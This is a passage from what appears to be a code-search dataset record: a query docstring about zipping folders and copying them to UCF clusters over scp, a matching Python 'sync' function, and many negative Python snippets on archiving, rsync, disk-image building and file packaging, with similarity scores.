'engine.1.' subscribes\n # to everything from engine 1, but there is no way to subscribe to\n # just stdout from everyone.\n # multiple calls to subscribe will add subscriptions, e.g. to subscribe to\n # engine 1's stderr and engine 2's stdout:\n # sub.SUBSCRIBE = b'engine.1.stderr'\n # sub.SUBSCRIBE = b'engine.2.stdout'\n sub.connect(iopub_url)\n while True:\n try:\n idents, msg = session.recv(sub, mode=0)\n except KeyboardInterrupt:\n return\n # ident always length 1 here\n topic = idents[0].decode('utf8', 'replace')\n if msg['msg_type'] == 'stream':\n # stdout/stderr\n # stream names are in msg['content']['name'], if you want to handle\n # them differently\n print(\"{}: {}\".format(topic, msg['content']['text']))\n elif msg['msg_type'] == 'error':\n # Python traceback\n c = msg['content']\n print(topic + ':')\n for line in c['traceback']:\n # indent lines\n print(' ' + line)\n elif msg['msg_type'] == 'error':\n # Python traceback\n c = msg['content']\n print(topic + ':')\n for line in c['traceback']:\n # indent lines\n print(' ' + line)", "def open_chef_connection(args):\n\n chefserver = chef_api.Cheferizer(\n url=args.get('auth_url'),\n client_pem=args.get('client_key'),\n user=args.get('client_name')\n )\n chefserver.open_pem()\n return chefserver", "def main():\n\n global _CLIENT\n\n logging.basicConfig(level=logging.DEBUG)\n app.logger.setLevel(logging.INFO)\n\n _CLIENT = Client('192.168.0.120', 443, 'root', 'calvin')\n _CLIENT.connect()\n\n\n app.run(debug=True)" ]
[ "0.65127397", "0.62745446", "0.59723467", "0.5956529", "0.59374183", "0.58881605", "0.5853393", "0.5802111", "0.57484627", "0.5721694", "0.5707348", "0.5700164", "0.5663848", "0.56471217", "0.56392187", "0.5619558", "0.55862945", "0.5568309", "0.5539452", "0.55311024", "0.5530674", "0.55116695", "0.5496154", "0.5495479", "0.54924494", "0.54732805", "0.5468134", "0.5462904", "0.5452154", "0.5452069", "0.54285145", "0.54237753", "0.5407396", "0.5405575", "0.54032487", "0.5394105", "0.53903717", "0.53848433", "0.5379566", "0.53763723", "0.53732634", "0.5370054", "0.5370054", "0.5370054", "0.53644365", "0.53577656", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5344678", "0.5325287", "0.52991164", "0.52775836", "0.5273334", "0.52598697", "0.525778", "0.52549106", "0.5247554", "0.52419424", "0.5229726", "0.52224475", "0.5221046", "0.521383", "0.5203353", "0.51979953", "0.5196941", "0.51955503", "0.51953423", "0.5188907", "0.51672906", "0.5163767", "0.5159386", "0.51522136", "0.5148787", "0.5141309" ]
0.58358824
7
This module creates a bash script to compressed desired files and folders and copies them to the UCF Clusters. For security purposes, this module does not save passwords or passphrases
def sync(directory_1, directory_2, key_address, user, server): import os # Creates a list of files in the working directory files = os.listdir() # If the bash file already exists, it deletes the bash file before making progress if 'sync.sh' in files: os.remove('sync.sh') else: pass with open('sync.sh', 'w') as f: f.write('#!/bin/bash\n') f.write('zip -r my_files.zip ' + str(directory_1) + '\n') f.write('scp -i ' + str(key_address) + ' my_files.zip ' + str(user) + \ '@' + str(server) + ':' + str(directory_2))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pack():\n clean_local()\n build()\n copy_json()\n optimize()\n tarball()", "def copy_scfu_folder(chem_form):\n\n src = calc_root + \"/\" + chem_form + \"/first_scfu/tmp\"\n dest = calc_root + \"/\" + chem_form + \"/hp/tmp\"\n\n f = open(\"rysnc.sh\",'w')\n f.write(\"\"\"\n #!/bin/bash\n\n # SETUP OPTIONS\n export SRCDIR=\"%s\"\n export DESTDIR=\"%s\"\n export THREADS=\"8\"\n\n # RSYNC DIRECTORY STRUCTURE\n rsync -zr -f\"+ */\" -f\"- *\" $SRCDIR/ $DESTDIR/ \\\n # FIND ALL FILES AND PASS THEM TO MULTIPLE RSYNC PROCESSES\n cd $SRCDIR && find . ! -type d -print0 | xargs -0 -n1 -P$THREADS -I%% rsync -az %% $DESTDIR/%%\"\"\"%(src,dest))\n f.close()\n subprocess.call(shlex.split(\"chmod +x rysnc.sh\"))\n subprocess.call(shlex.split(\"sh rysnc.sh\"))\n return", "def main():\n parser = argparse.ArgumentParser(description='Create packaged set of modulefiles for deployment on OASIS.')\n parser.add_argument('--location', dest='location', default=None,\n help='Location directory to place files in')\n parser.add_argument('--tarfile', dest='tarfile', default=None,\n help='Name of tarfile to generate')\n args = parser.parse_args(sys.argv[1:])\n if args.location is None:\n args.location = tempfile.mkdtemp()\n elif os.path.exists(args.location):\n overwrite = raw_input(\"{0} exists, overwrite? \".format(args.location))\n if overwrite.lower().strip() != 'y':\n sys.stderr.write(\"Exiting...\")\n sys.exit(0)\n shutil.rmtree(args.location)\n os.mkdir(args.location)\n else:\n os.mkdir(args.location)\n location = checkout_repo(args.location) \n if location is None:\n sys.stderr.write(\"Can't checkout modulefiles to {0}!\\n\".format(args.location))\n package_files(location)\n if args.tarfile is None:\n args.tarfile = \"/tmp/moduleupdate.tar.gz\"\n if tar_files(location, args.tarfile) is None:\n sys.stderr.write(\"Error generating tarfile, exiting\\n\")\n sys.exit(1)\n shutil.rmtree(location)\n sys.stdout.write(\"Packaged files located at {0}\\n\".format(args.tarfile))", "def do_pack():\n\n now = datetime.now()\n # format the name of the file with the timestamps\n now_year = now.year\n now_month = now.month\n now_day = now.day\n now_hour = now.hour\n now_minute = now.minute\n now_second = now.second\n # apply the format\n file_name = 'versions/web_static_{}{}{}{}{}{}.tgz'.format(\n now_year, now_month, now_day, now_hour, now_minute, now_second\n )\n # All archives must be stored in the folder versions\n local('mkdir -p versions')\n # execute locally the compression of the folder\n command = local(\"tar -cvzf \" + file_name + \" ./web_static/\")\n # return the archive path if the archive has been correctly generated\n if command.succeeded:\n return file_name\n else:\n return None", "def script(arch, version, variant, packages, mirror, disk_size, swap_size, image_format, root_password, hostname, no_confirm, output):\n\n # Checking validity of the command-line arguments.\n check_arguments(locals())\n\n # Checking if dependencies for this script are installed.\n check_dependencies(arch)\n\n # Make sure output value is correct and we won't run into any issue at the\n # final step (moving the result to its final location). We check the file\n # does not exist, and if its parent directory does exist.\n output = os.path.abspath(output)\n assert not os.path.exists(output), \"output value is incocrect; destination exists\"\n assert os.path.isdir(os.path.dirname(output)), \"output value is incorrect; parent folder does not exist\"\n\n # Compute partitions info (todo; compute actual infos)\n partitions = [\n ('esp', 512, 'fat32', 42, 42),\n ('root', 512, 'ext4', 42, 42),\n ('swap', 512, 'swap', 42, 42)\n ]\n\n # Compute list of packages that will be explicitly installed.\n packages = compute_packages(packages, locals())\n\n # Printing summary and asking for confirmation.\n summary_mesage = compute_summary_message(locals())\n\n if not no_confirm:\n summary_mesage += \\\n \"\\nPass the --no-confirm flag if you don't want to be prompted for confirmation.\\n\"\n\n print(summary_mesage)\n\n if not no_confirm:\n is_confirmed = input(\"Do you confirm those options ? [y/n] \")\n if not is_confirmed.lower().startswith('y'):\n print(\"Abort!\")\n exit(1)\n\n with tempfile.TemporaryDirectory() as tmp_dir:\n print(f\"Creating a raw disk image of size {disk_size}MiB\")\n disk_path = create_disk_image(tmp_dir, disk_size)\n\n print(\"Partitioning the disk...\")\n partition_disk(disk_path, disk_size, swap_size)\n\n loop_device = '/dev/loop42'\n with attach_to_loop_device(disk_path, loop_device):\n print(\"Formatting partitions...\")\n format_partitions(loop_device)\n\n mount_dir = os.path.join(tmp_dir, 'mnt')\n os.mkdir(mount_dir)\n\n with mount_root_partition(loop_device, mount_dir):\n create_chroot_environment(mount_dir, arch, version, variant, mirror, packages)\n\n # In order to chroot into a filesystem with an architecture\n # different than the host, we need to install a binary\n # interpreter.\n if arch == 'armhf':\n print(\"Copying qemu-arm-static to the chroot environment\")\n shutil.copy2('/usr/bin/qemu-arm-static', os.path.join(mount_dir, 'usr/bin/'))\n elif arch == 'arm64':\n print(\"Copying qemu-aarch64-static to the chroot environment\")\n shutil.copy2('/usr/bin/qemu-aarch64-static', os.path.join(mount_dir, 'usr/bin/'))\n\n with mount_boot_partition(loop_device, mount_dir):\n with mount_transient_files(mount_dir):\n # Configure the GRUB boot loader.\n if arch == 'armhf':\n grub_package = 'grub-efi-arm'\n grub_target = 'arm-efi'\n elif arch == 'arm64':\n grub_package = 'grub-efi-arm64'\n grub_target = 'arm64-efi'\n elif arch == 'amd64':\n grub_package = 'grub-efi-amd64'\n grub_target = 'x86_64-efi'\n\n update_system_cmd = ['apt-get', 'update']\n run_chroot_command(update_system_cmd, mount_dir, arch)\n\n install_grub_pkg_cmd = ['apt-get', 'install', '-y', '--install-recommends', grub_package]\n run_chroot_command(install_grub_pkg_cmd, mount_dir, arch)\n\n purge_osprober_cmd = ['apt-get', '--autoremove', '-y', 'purge', 'os-prober']\n run_chroot_command(purge_osprober_cmd, mount_dir, arch)\n\n # Adjust the '/etc/default/grub' file\n with open(os.path.join(mount_dir, 'etc/default/grub'), 'r') as file:\n text = file.read()\n\n # TODO; adjust text variable\n\n with open(os.path.join(mount_dir, 'etc/default/grub'), 'w') as file:\n file.write(text)\n\n grub_mkconfig_cmd = ['grub-mkconfig', '-o', '/boot/grub/grub.cfg']\n run_chroot_command(grub_mkconfig_cmd, mount_dir, arch)\n\n grub_install_cmd = [\n 'grub-install',\n f'--target={grub_target}',\n '--force-extra-removable',\n '--no-nvram',\n '--no-floppy',\n '--modules=\\\\\"part_msdos part_gpt\\\\\"',\n '--grub-mkdevicemap=/boot/grub/device.map',\n loop_device\n ]\n run_chroot_command(grub_install_cmd, mount_dir, arch)\n\n print(\"Updating /etc/hostname\")\n configure_hostname(mount_dir, 'foo')\n\n print(\"Updating /etc/fstab\")\n configure_fstab(mount_dir)\n\n print(\"Updating /etc/network/interfaces\")\n configure_network_interfaces(mount_dir)\n\n # TODO; run user provided script here...\n\n # Remove the binary interpreter from the chroot environment.\n if arch == 'armhf':\n print(\"Removing qemu-arm-static from the chroot environment\")\n os.remove(os.path.join(mount_dir, 'usr/bin/qemu-arm-static'))\n elif arch == 'arm64':\n print(\"Removing qemu-aarch64-static from the chroot environment\")\n os.remove(os.path.join(mount_dir, 'usr/bin/qemu-aarch64-static'))\n\n # Convert raw disk image to the requested format and and move the result to\n # the requested location.\n if image_format != 'raw':\n print(f\"Converting disk image to {image_format} format...\")\n\n new_disk_path = os.path.join(tmp_dir, 'disk.' + image_format)\n subprocess.run([\n 'qemu-img', 'convert',\n '-f', 'raw',\n '-O', image_format,\n disk_path, new_disk_path\n ])\n\n disk_path = new_disk_path\n\n shutil.move(disk_path, output)\n\n print(\"Done!\")", "def main():\r\n parser = CommonArgParser(__file__)\r\n parser.add_argument('src_dir', help='Source directory')\r\n parser.add_argument(\r\n 'out_dir',\r\n default='.',\r\n help=\"\"\"The directory the files to be extracted.\r\n (Default: Current directoty\"\"\")\r\n args = parser.parse_all()\r\n for f in next_file(args.src_dir, ['*.tgz', '*.tar.gz']):\r\n untgz(f, args.out_dir)", "def main():\n run_time_str = datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n log = _prepare_logging()\n Args = collections.namedtuple(\n \"Args\",\n (\n \"input_paths\",\n \"output_path\",\n \"root_directory\",\n \"ignore_dotfiles\",\n \"ignore_windows_volume_folders\",\n ),\n )\n # If we are running from Mac Automator, take file paths from sys.argv\n if check_running_from_automator():\n # Example sys.argv for two files selected: ['-c', '/absolute/path/1.txt',\n # '/absolute/path/to/2.txt']\n args = Args(\n input_paths=sys.argv[1:],\n output_path=None,\n root_directory=False,\n ignore_dotfiles=False,\n ignore_windows_volume_folders=False,\n )\n # Otherwise, use argparse and allow for some additional options\n else:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input_paths\", nargs=\"+\", help=\"Items to compress\")\n parser.add_argument(\"-o\", \"--output_path\", \"--output\", help=\"Filename for zip\")\n parser.add_argument(\n \"-d\",\n \"--root-directory\",\n action=\"store_true\",\n help=\"Place all files in zip within a shared parent folder\",\n )\n parser.add_argument(\n \"--ignore-dotfiles\",\n action=\"store_true\",\n help=\"Ignore files and folders beginning with '.' (typically these are hidden folders)\",\n )\n parser.add_argument(\n \"--ignore-windows-volume-folders\",\n action=\"store_true\",\n help=(\n \"Ignore folders named 'System Volume Information' and '$RECYCLE.BIN' (typically\"\n \" these contain hidden system information)\"\n ),\n )\n\n parsed_args = parser.parse_args()\n args = Args(**vars(parsed_args))\n\n # Check passed arguments and return if issues\n if get_missing_sources(args.input_paths):\n printer(\n \"Path(s) {} not found\".format(get_list_as_str(get_missing_sources(args.input_paths))),\n \"error\",\n True,\n )\n return\n\n # Set path separator based on OS\n if platform.system() == \"Windows\":\n path_separator = \"\\\\\"\n else:\n path_separator = \"/\"\n\n # Convert input paths into absolute paths\n input_paths = [os.path.abspath(path) for path in args.input_paths]\n\n # Set output path\n if args.output_path is not None:\n output_path = args.output_path\n output_directory = os.path.dirname(output_path)\n else:\n if check_running_from_automator():\n # Last item in the list of arguments will be the last item clicked in Finder\n output_directory = os.path.dirname(input_paths[-1])\n else:\n output_directory = \".\"\n if len(input_paths) == 1:\n output_filename = os.path.basename(\"{}.zip\".format(input_paths[0]))\n else:\n output_filename = \"{}_archive.zip\".format(run_time_str)\n output_path = get_safe_file_path(os.path.join(output_directory, output_filename))\n printer(\"Zip file will be created at path '{}'\".format(output_path), \"info\")\n\n # Create zipfile and get file_hash_dict info for subsequent verification\n try:\n file_hash_dict, total_file_count = create_zip(\n output_path,\n input_paths,\n args.ignore_dotfiles,\n args.ignore_windows_volume_folders,\n args.root_directory,\n path_separator,\n )\n except:\n # Log the exception to a file, so we can view later if running from Automator\n error_log_file_path = os.path.join(\n output_directory, \"{}_verizip_error.txt\".format(run_time_str)\n )\n error_log_handler = logging.FileHandler(error_log_file_path)\n error_log_handler.setLevel(logging.ERROR)\n error_log_handler.setFormatter(\n logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n )\n log.addHandler(error_log_handler)\n log.exception(\"Exception occurred during creation of zip file '%s':\", output_path)\n printer(\n \"Error occurred - see '{}'\".format(os.path.abspath(error_log_file_path)), \"error\", True\n )\n if os.path.isfile(output_path):\n os.remove(output_path)\n return\n printer(\"'{}' finalised - will now be verified\".format(output_path), \"info\")\n\n # Get hashes of files within finalised zip\n zip_hash_dict = {}\n with zipfile.ZipFile(output_path, \"r\") as zip_handler:\n zip_file_listing = zip_handler.namelist()\n zip_file_count = 0\n for file_within_zip in zip_file_listing:\n # Todo: confirm no 'file_info.is_dir()' type check needed here - don't believe so, as\n # only files with paths are being added, rather than directories as separate archive\n # items\n zip_file_count += 1\n hash_value = hash_file_in_zip(zip_handler, file_within_zip)\n if hash_value not in zip_hash_dict:\n zip_hash_dict[hash_value] = []\n zip_hash_dict[hash_value].append(file_within_zip)\n\n # Verify that hashes from source files match those for compressed files within newly-created zip\n if file_hash_dict == zip_hash_dict and total_file_count == zip_file_count:\n printer(\"Verification complete; no discrepancies identified\", \"info\")\n printer(\"'{}' created successfully\".format(output_path), \"info\", True)\n else:\n error_log_file_path = os.path.join(\n output_directory, \"{}_verizip_error.txt\".format(run_time_str)\n )\n with open(error_log_file_path, \"w\") as error_log_file_handler:\n for hash_value, file_paths in file_hash_dict.items():\n if hash_value not in zip_hash_dict:\n error_log_file_handler.write(\n \"Hash '{}' not present in zip file (with expected files {})\\n\".format(\n hash_value, get_list_as_str(file_paths)\n )\n )\n elif sorted(file_paths) != sorted(zip_hash_dict[hash_value]):\n error_log_file_handler.write(\n \"Files for hash '{}' do not match between source and zip ({} in source - {}\"\n \" in zip)\\n\".format(hash_value, file_paths, zip_hash_dict[hash_value])\n )\n printer(\n \"'{}' failed verification - see error log at '{}'\".format(\n output_path, os.path.abspath(error_log_file_path)\n ),\n \"error\",\n True,\n )\n os.remove(output_path) # Delete the zip that failed verification", "def prep(path,date,image):\n \n # run bash code with 'Popen'\n P = Popen('cp '+path+date+'/final/'+image+' ./', shell=True)\n P.wait()\n P = Popen('mv '+image+' '+image+'.fz', shell=True)\n P.wait()\n P = Popen('funpack *.fz', shell=True)\n P.wait()\n P = Popen('rm -rf *.fz', shell=True)\n P.wait()", "def main():\n if len(sys.argv) != 2:\n print(\"Error: Incorrect number of arguments. Expected 1.\")\n print(\"Usage: python compress.py <path to file to compress>\")\n print(\"Example: python compress.py zones.json\")\n exit(1)\n\n with open(sys.argv[1], \"rb\") as r, \\\n open(\"{}.br\".format(sys.argv[1]), \"wb\") as w:\n w.write(brotli.compress(r.read()))", "def setup(self, **kwargs):\n if self.bash_script:\n src = os.fspath(FILES / self.bash_script)\n dst = os.fspath(self.project_dir / self.bash_script)\n shutil.copy(src, dst)", "def do_pack():\n time_test = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n file_name = \"versions/web_static_\" + time_test + \".tgz\"\n command1 = \"mkdir -p versions\"\n command2 = \"tar -czvf \" + file_name + \" web_static\"\n local(command1)\n com = local(command2)\n if com.return_code == 0:\n return file_name\n else:\n return None", "def package():\n \n hou.hipFile.save()\n currentHip = hou.expandString(hou.hipFile.name())\n\n # create a temp directory we are going to fill with crap\n tempFilePath = tempfile.mkdtemp()\n \n otls = os.path.join(tempFilePath, \"otls\")\n os.mkdir(otls)\n files = os.path.join(tempFilePath, \"files\")\n os.mkdir(files)\n \n # Get all the external references to the hipfile\n fileOnDisk = hou.fileReferences()\n\n # loop and do what comes natural.\n for _file in fileOnDisk:\n\n parm = _file[0]\n filepath = _file[1]\n \n # if its a otl we need to store it.\n if filepath.endswith(\".otl\"):\n \n shutil.copy(hou.expandString(filepath), otls)\n \n else:\n \n if not os.path.isfile(hou.expandString(filepath)): \n \n continue\n \n # create a directory in files and save 1 file to that location\n tmpFileName = os.path.basename(hou.expandString(filepath))\n tmpFileDir = os.path.basename(os.path.dirname(hou.expandString(filepath)))\n path = os.path.join(files, tmpFileDir)\n \n if not os.path.isdir(path):\n \n os.mkdir(path)\n\n shutil.copy(hou.expandString(filepath), os.path.join(path, os.path.basename(hou.expandString(filepath))))\n\n try:\n \n if not parm.node().isLocked():\n \n parm.set(os.path.join(path.replace(tempFilePath, \"$HIP\"), tmpFileName))\n \n except hou.PermissionError: \n \n logging.warning(\"Error hardening parm :\" + str(parm.name()) + \"on node \" +parm.node().path())\n\n hou.hipFile.save(os.path.join(tempFilePath, os.path.basename(hou.expandString(hou.hipFile.name()))))\n # Load the source hipfile\n hou.hipFile.load(currentHip)\n \n # create a zipfile and package everything. then copy it to the home.\n zipfileLoc = zipdir(tempFilePath)\n shutil.move(zipfileLoc, os.path.join(hou.expandString(\"~\"), \"package.zip\"))\n shutil.rmtree(tempFilePath)", "def run(self):\n self.compress(\n self.__config.public_key(),\n self.__config.input_dir(),\n self.__config.output_dir(),\n self.__config.suffix()\n )", "def unpack_or_cp():\n if args.input_type == \"zip\":\n zip_out, zip_error = Popen([\"unzip\", args.input, \"-d\", args.out_folder.strip() + \"/fasta\"], stdout=PIPE,stderr=PIPE).communicate()\n admin_log(zip_out, zip_error)\n else:\n cp_out, cp_error = Popen([\"cp\", args.input, args.out_folder.strip() + \"/fasta\"], stdout=PIPE,stderr=PIPE).communicate()\n admin_log(cp_out, cp_error)", "def main(args):\n\n for dir in args.dirs:\n # prepdir = mdssprep.Directory(dir,exclude=['file_*3*','file_2??'],include=['file_*5*'],maxarchivesize=mdssprep.one_meg*200.,minsize=mdssprep.one_meg*100.)\n prepdir = mdssprep.Directory(dir)\n prepdir.archive(dryrun=False)", "def do_cp(cs, args):\n if ':' in args.source:\n source_parts = args.source.split(':', 1)\n container_id = source_parts[0]\n container_path = source_parts[1]\n opts = {}\n opts['id'] = container_id\n opts['path'] = container_path\n\n res = cs.containers.get_archive(**opts)\n dest_path = args.destination\n tardata = io.BytesIO(res['data'])\n with closing(tarfile.open(fileobj=tardata)) as tar:\n tar.extractall(dest_path) # nosec\n\n elif ':' in args.destination:\n dest_parts = args.destination.split(':', 1)\n container_id = dest_parts[0]\n container_path = dest_parts[1]\n filename = os.path.split(args.source)[1]\n opts = {}\n opts['id'] = container_id\n opts['path'] = container_path\n tardata = io.BytesIO()\n with closing(tarfile.open(fileobj=tardata, mode='w')) as tar:\n tar.add(args.source, arcname=filename)\n opts['data'] = tardata.getvalue()\n cs.containers.put_archive(**opts)\n\n else:\n print(\"Please check the parameters for zun copy!\")\n print(\"Usage:\")\n print(\"zun cp container:src_path dest_path|-\")\n print(\"zun cp src_path|- container:dest_path\")", "def run(self):\n self.archive_bash_inits()\n self.create_paths()\n self.copy_files()\n self.make_git_config()\n self.ensure_bash_history()", "def main():\n\n print \"Starting tar-maker script..\"\n # String of files we're going to be looking for\n files=\"runlocaltests.py testprocess.py verifyfiles.mix cleanup_deploy.py hashes.dict upgrade_nodes.sh deploy_helper.py\"\n\n # TODO: add list of 'optional files' to include\n\n # get the files passed in as arguments\n files_from_args = ''\n # 1 skips this file name\n print\n \n for eachfile in range(1, len(sys.argv)):\n print \"Adding custom file: \"+sys.argv[eachfile]\n files_from_args+=' '+sys.argv[eachfile]\n print\n # mash the two strings together now\n files+=files_from_args\n\n # Total number of files split by spaces\n total_files=len(files.split(' '))\n\n # Counter for found files\n num_files_found=0\n\n # Temporary tar, incrementally we'll build it up\n # Will remove the temp files (since I use -update flag)\n # for building up the .tar\n if os.path.isfile('./deploy.tar.temp'):\n os.remove('./deploy.tar.temp')\n\n\n for filename in files.split(' '):\n print ' Looking for '+filename+' in '+os.getcwd()\n if os.path.isfile('./'+filename):\n print ' File found!'\n num_files_found += 1\n shellexec('tar -rf deploy.tar.temp '+filename)\n else:\n print ' WARNING: '+filename+' NOT FOUND'\n\n print\n print \"Found \"+str(num_files_found)+\" of \"+str(total_files)+\" necessary files.\"\n print\n\n # Did we find all of the files?\n if num_files_found == total_files:\n print\n print 'All files found, finishing tar..'\n # rename the file to the final name.\n # this will over-write current deploy.tar in the dir if one exists \n shellexec('mv deploy.tar.temp deploy.tar')\n return 0\n else:\n print 'FATAL ERROR: Not all the files where found, please check that '\n print ' this script is in the same directory as the files. '\n print\n print \"Cleaning up temp files...\"\n \n # remove deploy.tar.temp only if it exists.\n if os.path.isfile('./deploy.tar.temp'):\n os.remove('./deploy.tar.temp')\n \n print\n print 'Finished (with errors)'\n return 1", "def setup(zip_path, dest_path):\n\n #makes folder for zip files\n make_directory(zip_path)\n\n #makes folder for processed data\n make_directory(dest_path)", "def gzip_assets():\n run('cd %(repo_path)s; python gzip_assets.py' % env)", "def main(binary_name, code_directory, verbose, clase):\n print(\"Start of binaries generation\")\n #Directory to iterate\n directory = '../../results/'+code_directory + '/' + clase + '/application_signature/'\n #Directory to store the binaries to generate\n bin_directory = './bin/'\n #Task to performed on the new script\n make_clean = 'make clean\\n'\n for dirs in os.listdir(directory):\n print('Generating binary for path', dirs)\n if os.path.exists(directory+dirs+'/bin/'+dirs):\n os.remove(directory+dirs+'/bin/'+dirs)\n #Creation of the script\n with open(directory+dirs+'/make_bin.sh', 'w') as bin_file:\n bin_file.write('#! /bin/bash\\n')\n bin_file.write(make_clean+'\\n')\n bin_file.write('make '+code_directory+' CLASS='+clase+'\\n')\n bin_file.write('mv '+bin_directory+binary_name+' '+bin_directory+binary_name+'_'+dirs+'\\n')\n bin_file.write(make_clean)\n bin_file.close()\n try:\n #Changing privileges so script can be executed automatically\n os.chmod(directory+dirs+'/make_bin.sh', 0o777)\n #Move to directory where script is to be executed\n cwd = os.getcwd()\n #Change cwd to execute script generating the binary\n os.chdir(directory+dirs)\n if verbose:\n subprocess.check_call('./make_bin.sh')\n else:\n subprocess.check_call('./make_bin.sh', stdout=subprocess.PIPE, shell=False)\n \n os.chdir(cwd)\n except FileNotFoundError as e:\n logger.error(e)\n raise\n print('End of binaries generation')", "def do_pack():\n local(\"sudo mkdir -p versions\")\n date_time = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n name_file = \"versions/web_static{}.tgz\".format(date_time)\n local(\"sudo tar -cvzf {} web_static\".format(name_file))\n return name_file", "def create_bootstrap_script(scratch_dir):\n install_script = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"install\")\n shutil.copy(install_script, os.path.join(scratch_dir, \"install\"))", "def execution_transfer_script(self, resources):\n\n # fixme -- json is an inefficient pickle.\n # - slow\n # - nodes will need to be dealiased again.\n #\n manifest_s = repr(json.dumps(self.data.manifest()))\n canonical_s = repr(json.dumps(self.data.canonical()))\n resources_s = repr(resources)\n\n # this doesn't get carried on the other side\n default_region = _get_default_region()\n\n hooks = \"\\n\".join(runtime.add_user_hook._hooks)\n\n return \"\"\"#!/usr/bin/env python3\nimport bunnies.runtime\nimport bunnies.constants as C\nfrom bunnies.unmarshall import unmarshall\nimport os, os.path\nimport json\nimport logging\nlog = logging.getLogger()\n\n# USER HOOKS START\n%(hooks)s\n# USER HOOKS END\n\nuid_s = %(uid_s)s\n\ncanonical_s = %(canonical_s)s\n\nmanifest_s = %(manifest_s)s\n\nmanifest_obj = json.loads(manifest_s)\n\ncanonical_obj = json.loads(canonical_s)\n\nbunnies.setup_logging()\n\n# this is for align binaries\nos.environ['AWS_REGION'] = %(default_region)s\n# this is for the boto client\nos.environ['AWS_DEFAULT_REGION'] = %(default_region)s\n\ntransform = unmarshall(manifest_obj)\nlog.info(\"%%s\", json.dumps(manifest_obj, indent=4))\n\nparams = {\n 'workdir': os.environ.get('BUNNIES_WORKDIR'),\n 'scriptdir': os.path.dirname(__file__),\n 'job_id': os.environ.get('BUNNIES_JOBID'),\n 'resources': %(resources_s)s\n }\n\nbunnies.runtime.setenv_batch_metadata()\nenv_copy = dict(os.environ)\n\n# core of the work\noutput = transform.run(**params)\n\n# write results\nresult_path = os.path.join(transform.output_prefix(), C.TRANSFORM_RESULT_FILE)\nbunnies.runtime.update_result(result_path,\n output=output,\n manifest=manifest_obj,\n canonical=canonical_obj,\n environment=env_copy)\n\"\"\" % {\n 'manifest_s': manifest_s,\n 'canonical_s': canonical_s,\n 'default_region': repr(default_region),\n 'uid_s': repr(self.uid),\n 'hooks': hooks,\n 'resources_s': resources_s\n}", "def _install():\n download_file='http://www.ipol.im/pub/art/2015/136/inpaint_8.tgz'\n tools.download_and_extract(download_file) \n this_file_path=os.path.dirname(__file__)\n subprocess.call(' mkdir build; cd build; cmake ..; make', shell=True,cwd=exec_folder)", "def bulk_upload ( server, identity, src_dir, tgt_dir ) :\n tmp_tarfilepath = '/tmp/'\n tmp_tarfilename = server + '.tar.gz'\n tmp_file = tmp_tarfilepath + tmp_tarfilename\n\n # Tar up the src directory\n s = subprocess.call( [ '/bin/sh', '-c',\n 'cd ' + src_dir + ' && tar czf ' + tmp_file + ' .' ] )\n if s != 0 :\n print 'Unable to upload files.'\n return s\n\n # Copy the tar file up to the server\n s = scp_call( server, identity, tmp_file, tmp_tarfilepath )\n if s != 0 :\n print 'Unable to upload files.'\n return s\n\n # Unpack the tar file on the server\n s = ssh_call( server,\n identity,\n 'cd ' + tgt_dir + ' && sudo tar xzf ' + tmp_file + ' && rm ' + tmp_file + ' && sudo chown -R root:root *' )\n return s", "def run(self):\n for lof in self.data_files:\n if lof[0]:\n base = getattr(self, 'install_' + lof[0])\n else:\n base = getattr(self, 'install_base')\n dir = convert_path(lof[1])\n if not os.path.isabs(dir):\n dir = os.path.join(base, dir)\n elif self.root:\n dir = change_root(self.root, dir)\n self.mkpath(dir)\n\n files = lof[2]\n if len(files) == 0:\n # If there are no files listed, the user must be\n # trying to create an empty directory, so add the\n # directory to the list of output files.\n self.outfiles.append(dir)\n else:\n # Copy files, adding them to the list of output files.\n for f in files:\n f = convert_path(f)\n (out, _) = self.copy_file(f, dir)\n #print \"DEBUG: \", out # dbg\n self.outfiles.append(out)\n \n\n return self.outfiles", "def _compress_meds_file(self, ucfilename, fzfilename):\n from os.path import basename\n\n tup=(basename(ucfilename),basename(fzfilename))\n print('compressing file: %s -> %s' % tup)\n tpath=files.expandpath(fzfilename)\n if os.path.exists(tpath):\n os.remove(tpath)\n\n tmpdir = os.path.dirname(ucfilename)\n with StagedOutFile(fzfilename,tmpdir=tmpdir) as sf:\n cmd = self['fpack_command']\n cmd = cmd.format(fname=ucfilename)\n ret=os.system(cmd)\n\n if ret != 0:\n raise RuntimeError(\"failed to compress file\")\n\n print('output is in:',fzfilename)", "def gzip_files(topDir, afni_file,localizerfile):\n\n print 'GZIPPING FILES...'\n\n command1 = \"gzip %s*BRIK\" % (topDir)\n command2 = \"gzip %s*HEAD\" % (topDir)\n command3 = \"gzip %s%s/pb00*\" % (topDir,afni_file)\n command4 = \"gzip %s%s/errts*\" % (topDir,afni_file)\n command5 = \"gzip %s%s/fitts*\" % (topDir,afni_file)\n command6 = \"gzip %s%s/*al*\" % (topDir,afni_file)\n command7 = \"gzip %s%s/*ns*\" % (topDir,afni_file)\n command8 = \"gzip %s%s/all_runs*\" % (topDir,afni_file)\n command9 = \"gzip %s%s/*mask*\" % (topDir,afni_file)\n command10 = \"gzip %s*nii\" % (topDir)\n command11 = \"gzip %s%s/pb01*\" % (topDir,afni_file)\n command12 = \"gzip %s%s/pb03*\" % (topDir,afni_file)\n command13 = \"gzip %s%s/pb02*\" % (topDir,afni_file)\n\n os.system(command1)\n os.system(command2)\n os.system(command3)\n os.system(command4)\n os.system(command5)\n os.system(command6)\n os.system(command7)\n os.system(command8)\n #os.system(command9)\n os.system(command10)\n os.system(command11)\n try:\n os.system(command12)\n except:\n print 'Could not gzip pb03 files'\n\n if localizerfile == 'facescene_loc':\n os.system(command13)", "def scriptGen(self,tmpd='/tmp/jose',libRev='last',submode='qsub',\n redirect=1,PBSoptions=''):\n 